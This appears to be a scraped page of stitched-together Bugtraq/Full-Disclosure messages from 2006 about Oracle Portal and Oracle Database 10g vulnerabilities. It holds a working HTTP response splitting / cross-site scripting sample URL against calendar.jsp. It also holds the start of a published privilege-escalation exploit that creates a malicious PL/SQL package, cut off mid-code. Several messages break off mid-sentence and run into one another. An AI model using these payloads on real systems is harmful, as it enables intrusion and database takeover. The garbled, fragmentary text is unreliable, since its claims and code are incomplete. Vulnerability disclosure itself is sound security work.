Description
---
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may find in any version:
From: Brian Eaton [EMAIL PROTECTED]
To: putosoft softputo [EMAIL PROTECTED]
CC: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
Date: Wed, 20 Dec 2006 13:55:09 -0500
On 12/20/06, putosoft softputo [EMAIL
Oracle Portal/Applications HTTP Response Splitting
--
Sample:
http://target/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
How can an attack be conducted?
I can't believe it. Oracle releases new patches and they have not
solved one of the main problems: A user with only the SELECT privilege can
do WHATEVER (S)HE WANTS WITH THE ENTIRE DATABASE
I'm not sure if it is time to fully disclose it but, anyway, I will fully
disclose one innocent
Hello,
I have found a security problem in the DBMS_STANDARD package. Does anyone
know any kind of workaround for this problem? You can't create a package
called DBMS_STANDARD and rename the old one to any other name to create a
wrapper so there is no way (I think) to solve it.
Any
Patches for 10.2.0.2.0 have been released but the bug is not solved. Patches
for other platforms (such as HPUX or AIX) have been re-scheduled. It's not
important because ANY platform (even with latest CPU) is vulnerable.
An exploit for Oracle 10.2.0.2.0 was published by N1v1hD $3c41r3 and
/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN